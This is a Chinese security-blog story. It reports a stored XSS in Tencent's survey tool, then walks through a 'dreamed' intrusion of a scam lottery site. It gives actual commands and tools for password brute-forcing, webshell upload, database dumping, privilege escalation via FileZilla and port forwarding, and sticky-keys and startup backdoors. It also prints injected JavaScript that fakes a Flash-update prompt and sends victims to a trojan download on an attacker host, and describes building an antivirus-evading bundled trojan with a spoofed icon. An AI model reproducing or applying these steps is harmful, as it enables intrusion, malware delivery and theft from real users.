原文来自SecIN社区—作者:哄哄
计划制定
2020年9月的某一天,天朗气清,惠风和畅。我默默打开日历,打算看下今日运势,宜划水、聊天、睡觉。与我努力奋斗积极向上的性格不合。正在我沉思之时,突然收到一条消息:中秋来临,各大SRC送月饼了!还有一张一积分换月饼的截图。
SRC?中秋?月饼?送?本着字少事大不懂就查的我敏锐从中嗅到了不一样的味道。
虽然我还是一个迷倒万千少女的18岁的翩翩少年,且此前从未挖掘过漏洞,但是这并不影响我灵活的思路
以及我缜密的计划:
1.了解什么是SRC
2.找一个漏洞提交
3.拿到月饼
于是自强自立我果断百度SRC,原来是机器学习!
接下来就是再找个漏洞,凭借我踏实的基础,我想到一个绝妙的payload没错!
<script>alert(1)</script>
万事具备,就差一个网站了!美滋滋呀!百度国内知名src,然后随便挑一个吧!看看哪一个呢?那就先腾讯的吧,毕竟作为一个百星荣耀王者选手,腾讯的面子还是要给的!先嫖它家月饼!
计划实施
1.打开链接,嗯?怎么就直接弹出调查问卷?好我填我填就是了。
点击马上填写,跳转到一个域名https://wj.qq.com/
我填呀填,填呀填,越填越气,你让我填我就填,我不要面子了?然后我恶向胆边生,看我xss!
<script>alert(1)</script>
2.出来吧!
然后我关掉页面再次打开,提示内容已保存可继续填写,点击继续填写到插入payload页面依旧保存出现弹框,难道月饼有了?啊?这…不会吧?不会吧?当然不会了!
咳咳,毕竟是第一次提交,有点着急,不过问题不大,因为上面我第二次重新填写的时候仍旧触发,凭借我丰富的经验,我觉得这是一个存储型
XSS,为了月饼,冲冲冲!
为了验证猜想,我登录腾讯问卷,点击创建问卷,由于触发点为用户输入的其他内容处,针对此触发点进行问卷创建。
创建完成后点击开始回收,复制链接即可进行问卷的填写。
完成后进入后台点击我的问卷-回收数据,可以看到用户提交的内容,如下图,可以看到用户的payload,竟然没有触发,啊哈?
正当点击编辑按钮查看用户输入的内容,并且准备大展身手查看是否被转义的时候,嗯哼,触发了…
此刻帅气迷人的我
然后,我果断提交坐等积分,并且积极的帮助工作人员解决问题。
最后,获得了积分2个。
当我兴冲冲的出发的时候!月饼月饼月饼!竟然没有月饼!!
为什么是把伞?我懂了。
后来我知道了,原来是1积分换的是狗子。此时我不禁想到上面问卷调查测试的时候我最喜欢的动物写的是狗,原来冥冥之中自有安排。
不过我丝毫不慌,因为我还有planB!
planB
经过上次的磨练现在我已经成长为一个经验丰富的SRC挖掘工,精通挖掘各种XSS漏洞,下面我将对狗子下手!颤抖吧!狗子!思路同上!经过漫长等待积分到手!虽然只有两个!
但是???
抱歉月饼!来晚了!
planC
经历了2次失败的我万念俱灰,只想大睡一场,我觉得月饼在梦里,于是我去睡觉了。
繁星点点的夜空之下,天台之上。两个身影。
“货带了吗?”
“箱子里,给我个机会,现在我想做个好人。”
“砰!”一声qiang响,一道黑影倒下。
“为什么?”
五百平别墅的大厅的沙发上我正在吃烤鱼。
“老大,这是线人提供的对方内部APP,上面要求这次一网打尽!”
“知道了。”
没错,现在的我是个精通逆向流量分析、手工注入、钓鱼、内网渗透、手握0day口算md5的渗透大佬。
我接过小弟送过来的iphone12,熟练的挂上代理,打开BP,添加证书,启动APP,没有数据包。问题不大,不过是双向认证罢了,看我采用突破SLL-Pinning的经典操作:Xposed+justTrustme模块。
原理:将各种已知的的HTTP请求库中用于校验证书的API都进行Hook,使无论是否是可信证书的情况,校验结果返回都为正常状态,从而实现绕过证书检查的效果。
步骤:先这样这样,在这样这样就可以了。
成果:通过分析找到后台登录地址。
默默的给自己泡了杯云南金瓜贡茶,开始搞它。
1.常用弱口令字典一波suoha,无果,问题不大祭出社工字典,这里使用cupp。
git clone https://github.com/Mebus/cupp.git
python3 cupp.py -i #进入交互模式按需要输入即可
验证码使用bp插件captcha-killer
github项目地址:https://github.com/c0ny1/captcha-killer/releases
步骤:
1.找到文字识别
2.创建应用
3.创建完成查看应用会看到生成的key
参考:https://ai.baidu.com/ai-doc/REFERENCE/Ck3dwjhhu
4.bp加载插件,获取数据包,发送
插件详细方法使用参考:https://gv7.me/articles/2019/burp-captcha-killer-usage/
5.最后爆破成功得到一个后台账号,登录后台
6.简单看下功能,发现一处头像上传
尝试上传图片,获取数据包后更改后缀进行绕过,上传成功后访问无法解析,重新尝试,更改图中绿框中位置及文件名,上传成功。
访问该文件,可解析
使用蚁剑连接,执行whoami查看权限,为IIS权限,至此获取网站权限。
7.开始第二阶段,获取目标数据。
测试可对当前目录进行读写,查看服务器开放端口,开放3389端口,采用最简单直接方法,翻找配置文件,一般配置文件命名在网站目录下且一般命名带有config字样,一番猛虎操作,找到配置文件得到数据库账号密码
8.上传mysqldump.exe执行命令
mysqldump -uroot -p密码 --all-databases > D:/wwwroot/xxx.net/xxx/dump.zip
完成后访问该URL下载zip格式文件更该后缀为.sql还原数据库即可
9.开始分析数据库内容。
打开navicat连接本地mysql数据库,选择运行sql文件
导入之前下载的数据库,点击开始
完成之后
???
照顾一下密集恐惧者吧[手动难受],开始漫长的体力劳动,一个个库一个个表的翻看
最后经过一瓶无糖雪碧椰子水汽水的漫长时间,梳理出代理账号N条,抽奖者用户记录N+1条。资金流水0毛。可具备坚韧不拔气质的我岂能认输?
又经过努力的体力劳动,发现且部分推广内容为微信抽奖,且存在有wxopenid
解密部分代理账号登录查看发现代理用户可自定义奖品并生成网页链接及二维码,且每个代理有自己的抽奖二维码,是否中奖都可后台进行设置,也就是说我让你中你就中让你不中就不中,之后访问该链接可以进行抽奖,但须要输入抽奖码才可进行抽取
之后抽奖完成后基本都是中奖,下面有个兑奖的二维码,扫描二维码后进行付款的操作。
至此,我决定总结推理一下:
管理员账号可以添加代理账号;
代理账号可以自定义抽奖的奖品,可以自己生成抽奖码,每个代理有自己的抽奖二维码;
扫描抽奖二维码进入自定义的抽奖页面,需要输入姓名和抽奖码,抽奖完成后基本都是中奖,之后出现兑奖二维码,扫描二维码跳转进行付款。
由于其数据库中部分提示信息和wxopenid字段可以推测其推广主要是通过微信,包括关注公众号抽奖、拉好友加微信获取抽奖资格等方式。
由于数据库中并未涉及金额等重要数据,联系搜集的线索猜测其变现方式:抛出无空奖或高奖品进行诱惑,之后可能给受害者甜头让其拉人头获取受众,之后出售兑奖号码获利。
10.根据数据库及以上线索,基本推测出目标的作案手法,下面开始看看服务器上还有没有其他线索,根据获取的shell可以确认服务器拥有两个磁盘,C盘,D盘,网站放在D盘中,有读写权限,C盘仅部分目录可以访问,且只有读权限无写权限。
尝试提权。先使用了几个通用EXP,未果,mysql提权,未果。
cmd下执行systeminfo命令导出文件下载至本地,之后使用windows-exploit-suggester.py进行查找尝试提权,
尝试一遍后,全部没成功。
没关系,只见我修长洁白的双指灵活的敲击着键盘打出了tasklist
当我看到了fileZilla Server.exe以及dog之时
我知道,问题不大,又到了我的表演时刻
11.看我三方提权,根据iis权限翻看已有目录,找到filezilla配置文件,但无该目录文件编辑权限,可下载,存在多个账户,利用网上md5解密,得到其中一个账号密码。
为保持版本一致,下载该目录下的所有文件,由于filezilla分为前端连接及后端管理,后端为本地访问默认端口14147
由于之前多次提权时还使用过msf,利用msf反弹shell添加代理,shell中执行命令portfwd add -l 14147 -p 14147 -r 127.0.0.1 将本地14147端口转发到公网14147端口,使用下载好的客户端连接公网端口14147
设置C盘共享
获取C盘访问控制权
之后可利用shift后门远程连接3389获取system权限(将C:\windows\system32\sethc.exe替换为cmd.exe之后远程5次粘贴键弹出cmd命令窗口)或启动项
(位置:
/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/后门文件)反弹shell再或者利用mof提权。
12.权限做好后我又翻呀翻,啥也没翻到。
既然服务器、数据库都翻了,下面该接着搞人了,可这服务器看了下八辈子没人上,怎么办?那当然是我的xss了!
<script>alert(1)</script>
反正有了服务器的控制权,看数据库登录记录有有不少代理比较活跃,另外,由于这个网站比较好搞,猜测使用者安全意识不是太高。看能不能搞几个代理的个人PC吧,为此,我决定在网站后台登录页面插入xss钓鱼。
13.使用github上的flash钓鱼模板
https://github.com/r00tSe7en/Fake-flash.cn
下载完成后打开index.html文件,修改下载地址为木马下载地址,例如地址为http://www.xxx.com/fash.exe
服务器上再新建一个js文件,写入我们弹框的内容,并放到我们的服务器上,例如放到http://www.xxx.com/xss.js
window.alert = function(name){
var iframe = document. createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document. documentElement.appendChild(iframe);
window.frames [0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
window. location.href="此处填入用户点击确定后跳转的URL,如http://www.xxx.com/";
之后将xss代码插入目标网页中
<script src="http://www.xxx.com/xss.js"> </script>
当目标登录后台时弹出以下内容
点击确定后会自动跳转到我们制作好的钓鱼页面
点击立即下载就会下载我们制作好的文件
14.准备工作:一台服务器,一个相似域名,一个免杀马。
服务器推荐https://my.vultr.com/
优点:用完即可销毁,按小时计费,可备份快照,系统推荐安装ubuntu
apt install apache2 #安装一路y确定安装
/etc/init.d/apache2 start #启动服务
域名注册可以使用免费域名网站,例如,https://my.freenom.com/
免杀马,这里简单讲下思路,回头有时间整理一份详细的,可以使用一些开源项目,例如github上的掩日(可过部分杀软)等,或者多语言互相转换,php马转exe,再加上一层自解压等
免杀马制作好后为了更逼真,下载官方的文件利用自解压进行捆绑
同时选中官方文件和木马,创建自解压文件
选择高级-自解压选项-更新-覆盖所有文件
设置解压路径
设置提取后运行的文件
设置模式全部隐藏
点击确定后生成文件
为了更具有迷惑性使用 ResourceHacker修改图标,将文件拖入后选择操作-替换图标
选中正常的flash文件,点击替换,并另存为保存,命名为官网相同文件名
双击运行效果图
15.步骤完成后坐等上线,N久以后的某个凌晨鱼儿上线。
16.一周后,又是一个天朗气清的好日子。
“老大,上次任务完成后上面奖励了1千万!”
“哦,捐了吧。”
“啊?”
看着小弟惊讶的样子,我不禁叹了口气,或许多年后他才能明白我的用意。
17.“起来了!起来了!都起来!上班时间到了!”我揉了揉眼睛张望四周,一台巨大的黑色显示屏,一个键盘,一盆绿萝,原来刚才是个梦呀。“喂!说你呢,赶紧工作别乱看了!再睡扣钱!”
“收到!马上工作!”,此时我不禁回味起梦里让小弟捐钱的情景,是啊,有得必有失,得到金钱的同时必然会失去很多烦恼。
尾记:对了,听说云众投稿给发月饼,要不我把故事编一编,万一把机智可爱帅气善良漂亮美丽的审核大佬们忽悠过去了,我的月饼岂不是…
来源:freebuf.com 2020-12-10 15:08:03 by: SecIN技术社区
请登录后发表评论
注册